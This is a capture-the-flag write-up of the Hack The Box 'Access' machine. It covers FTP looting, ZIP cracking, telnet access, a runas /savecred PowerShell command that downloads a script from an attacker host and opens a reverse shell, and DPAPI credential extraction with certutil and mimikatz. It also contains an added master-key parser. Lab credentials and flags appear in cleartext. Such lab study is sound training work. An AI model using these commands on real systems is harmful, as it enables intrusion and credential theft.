HTB - Access

Enumeration


Scope

IP Address: 10.10.10.98

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
23/tcp open  telnet  syn-ack
80/tcp open  http    syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p21,23,80 $ip -sCV -oN Nmap/script-scan

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
* Open ports: 21 - 23 - 80
* UDP Open ports: None
* Services: FTP - TELNET - HTTP
* Versions: Microsoft ftpd, Microsoft IIS httpd 7.5
* Important Notes: anonymous FTP login allowed (FTP code 230)

Enumeration

HTTP: the web app at http://10.10.10.98 didn't reveal anything except a single image.

FTP: I usually mirror every file on an FTP server with one command and explore them locally:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip 

<snip>
FINISHED --2024-07-07 11:19:01--
Total wall clock time: 1m 4s
Downloaded: 5 files, 5.4M in 43s (129 KB/s)

All files are downloaded into a folder named 10.10.10.98:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ ls
10.10.10.98 Nmap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ tree 10.10.10.98  
10.10.10.98
├── Backups
│   └── backup.mdb
└── Engineer
    └── Access Control.zip

Looking into the zip file, it contains a .pst file and is encrypted:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ unzip -l 10.10.10.98/Engineer/Access\ Control.zip
Archive:  10.10.10.98/Engineer/Access Control.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   271360  2018-08-24 01:13   Access Control.pst

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Engineer/Access\ Control.zip                                            
10.10.10.98/Engineer/Access Control.zip: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted

I will extract the hash with John the Ripper and attempt to crack it:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ zip2john Access\ Control.zip > zip.hash

Cracking with rockyou.txt failed:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt   

<snip>
Session completed. 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --show                                     
0 password hashes cracked, 1 left

I want to know what that file is; from the output below it's a Microsoft Access database:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Backups/backup.mdb 
10.10.10.98/Backups/backup.mdb: Microsoft Access Database

I had to move it to a Windows host to explore it.

I found a table that contains usernames and passwords:

admin:admin
engineer:access4u@security
backup_admin:admin

I will try these credentials over telnet, since there is no SMB service:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ hydra -L users.lst -P passwords.list telnet://$ip

1 of 1 target completed, 0 valid password found

Initial Access


I remember that I couldn't crack the zip file, so I will try these passwords against it:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=passwords.list                  

<snip>
access4u@security (Access Control.zip/Access Control.pst) 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ 7z x Access\ Control.zip                                                                           
<snip>
Enter password (will not be echoed):

Everything is Ok

Size:       271360
Compressed: 10870

It revealed the Access Control.pst file, and I wanted to know its type:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file Access\ Control.pst 
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e

It's a Microsoft Outlook Personal Storage file, so I moved it to my Windows host and opened it with Outlook.

It contains an email with the following data

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,
John

So we get a new credential pair, security:4Cc3ssC0ntr0ller, and I will try it on telnet:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip     

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
C:\Users\security>type Desktop\user.txt
713d8fafce27a927227b6a3124c79ea3

User Flag: 713d8fafce27a927227b6a3124c79ea3


Privilege Escalation

When I land on any Windows machine on HTB, I always run cmdkey /list to view saved credentials:

C:\Users>cmdkey /list

Currently stored credentials:
    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator    

A saved Domain Password entry like this can be abused to run commands as Administrator with runas /savecred.

Since we can't execute .exe files, I will execute a .ps1 as administrator instead: I grab Invoke-PowerShellTcp.ps1 from my host, start a web server and an nc listener, and run the command as administrator.

We must add this line to Invoke-PowerShellTcp.ps1 so the function is invoked when the script runs:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 443

Change the IP and port to yours when modifying the file.

Web server

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ python3 -m http.server 80

Netcat listener

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443

C:\Users\security> runas /savecred /user:ACCESS\Administrator "PowerShell -c IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ web-server                                        
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [08/Jul/2024 05:31:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.98] 49161

PS C:\Windows\system32>whoami 
access\administrator
PS C:\Windows\system32> cd C:\Users\administrator\Desktop\
PS C:\Users\administrator\Desktop> type root.txt
066b2ca40b4ab07b4387c6e4fe06bc32

Root Flag: 066b2ca40b4ab07b4387c6e4fe06bc32

Alternative path

Since the administrator credential is stored in the security user's profile, we can recover it by decrypting the DPAPI secrets.

We need two files, the master key and the credential blob. They are located in the current user's profile under C:\Users\Security\AppData\Roaming\Microsoft\ but are hidden.

I personally use ls with the -Force flag to list hidden files:

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\


    Directory: C:\Users\Security\AppData\Roaming\Microsoft

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
<snip>
d---s         8/22/2018  10:18 PM            Credentials
d---s         8/22/2018  10:18 PM            Protect
<snip>

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Protect

    Directory: C:\Users\Security\AppData\Roaming\Microsoft\Protect

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d---s         8/22/2018  10:18 PM            S-1-5-21-953262931-566350628-63446256-1001
-a-hs         8/22/2018  10:18 PM         24 CREDHIST

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Credentials

    Directory: C:\Users\Security\AppData\Roaming\Microsoft\Credentials

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a-hs         8/22/2018  10:18 PM        538 51AB168BE4BDB3A603DADE4F8CA81290

I will encode the two files as base64 with certutil and decode them on my attack host:


C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 .\key
CertUtil: -encode command completed successfully.

C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290 .\key1
CertUtil: -encode command completed successfully. 

C:\Users\security>type key
-----BEGIN CERTIFICATE-----
<snip>
-----END CERTIFICATE-----

C:\Users\security>type key1
-----BEGIN CERTIFICATE-----
<snip>
-----END CERTIFICATE-----

On the Windows host, with mimikatz:


mimikatz # dpapi::masterkey /in:C:\Users\HTB\Desktop\masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 9c51ca4d00708c73d4fbff60b95e549e
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 4bb6dd9b5b9656d97b78f114796457f4
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {009668e5-9305-401b-ba0d-dfa0e11b34d0}



[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
  key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
  sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe
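The mimikatz output above is a dump of the master-key file's own structure. As an added example (not part of the original writeup or of mimikatz), the parser below splits a master-key file into the same header fields and blocks using the documented layout (mimikatz's KULL_M_DPAPI_MASTERKEYS, also used by impacket), so a responder can confirm which master-key GUID and KDF parameters a file carries without decrypting anything. The sample file is constructed from the header values shown above; its key bytes are zero filler, not real key material.

```python
import struct
import uuid

# Layout of a DPAPI user master-key file (%APPDATA%\Microsoft\Protect\<SID>\<GUID>):
# a 128-byte header followed by the masterkey, backupkey, credhist and domainkey
# blocks, each of the length the header declares.
HEADER_FMT = "<III72sIII4Q"  # dwVersion, unk0, unk1, szGuid (36 WCHAR), unk2, unk3, dwFlags, 4 lengths
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 128
MK_FMT = "<I16sIII"  # masterkey block: dwVersion, salt, rounds, algHash, algCrypt; pbKey follows
MK_HDR_LEN = struct.calcsize(MK_FMT)  # 32


def parse_masterkey_file(data: bytes) -> dict:
    """Return the header fields and the masterkey block's KDF parameters (no decryption)."""
    if len(data) < HEADER_LEN:
        raise ValueError("too short for a master-key file header")
    ver, _, _, guid_w, _, _, flags, mk_len, bk_len, ch_len, dk_len = struct.unpack_from(HEADER_FMT, data)
    if ver != 2:
        raise ValueError(f"unexpected dwVersion {ver}")
    if HEADER_LEN + mk_len + bk_len + ch_len + dk_len > len(data):
        raise ValueError("declared block lengths exceed file size")  # truncated or corrupt file
    mk = data[HEADER_LEN:HEADER_LEN + mk_len]
    mk_ver, salt, rounds, alg_hash, alg_crypt = struct.unpack_from(MK_FMT, mk)
    return {
        "szGuid": guid_w.decode("utf-16-le").rstrip("\x00"),
        "dwFlags": flags,  # policy flags, left uninterpreted here
        "dwMasterKeyLen": mk_len, "dwBackupKeyLen": bk_len,
        "dwCredHistLen": ch_len, "dwDomainKeyLen": dk_len,
        "masterkey": {"dwVersion": mk_ver, "salt": salt.hex(), "rounds": rounds,
                      "algHash": alg_hash, "algCrypt": alg_crypt,
                      "pbKey_len": len(mk) - MK_HDR_LEN},
    }


def build_sample() -> bytes:
    """Constructed sample reproducing the header values from the writeup's mimikatz dump;
    the pbKey bytes are zero filler (assumption: not the real encrypted key)."""
    guid = "0792c32e-48a5-4fe3-8b43-d93d64590580".encode("utf-16-le")
    mk = struct.pack(MK_FMT, 2, bytes.fromhex("9c51ca4d00708c73d4fbff60b95e549e"),
                     17400, 0x800E, 0x6610) + b"\x00" * 144
    bk = struct.pack(MK_FMT, 2, bytes.fromhex("4bb6dd9b5b9656d97b78f114796457f4"),
                     17400, 0x800E, 0x6610) + b"\x00" * 112
    ch = struct.pack("<I", 3) + uuid.UUID("009668e5-9305-401b-ba0d-dfa0e11b34d0").bytes_le
    header = struct.pack(HEADER_FMT, 2, 0, 0, guid, 0, 0, 5, len(mk), len(bk), len(ch), 0)
    return header + mk + bk + ch


if __name__ == "__main__":
    print(parse_masterkey_file(build_sample()))
```

The algHash/algCrypt values 0x800e and 0x6610 are the CALG_SHA_512 and CALG_AES_256 identifiers mimikatz prints, and the szGuid must match the guidMasterKey inside any credential blob that depends on this file.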

Decrypting the credential file with the master key:

Note: we can supply the master key explicitly with /masterkey:<key>, but mimikatz picks it up automatically from its volatile cache.

mimikatz # dpapi::cred /in:C:\Users\HTB\Desktop\credentials
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
  dwDataLen          : 00000100 - 256
  pbData             : <snip>
  dwSignLen          : 00000040 - 64
  pbSign             : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99

Decrypting Credential:
 * volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000f4 - 244
  credUnk0       : 00002004 - 8196

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 8/22/2018 9:18:49 PM
  unkFlagsOrSize : 00000038 - 56
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=ACCESS\Administrator
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : ACCESS\Administrator
  CredentialBlob : 55Acc3ssS3cur1ty@megacorp
  Attributes     : 0

So the admin credentials are administrator:55Acc3ssS3cur1ty@megacorp, which also work over telnet:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip

login: administrator
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>type Desktop\root.txt
066b2ca40b4ab07b43xxxxxxxxxxxxx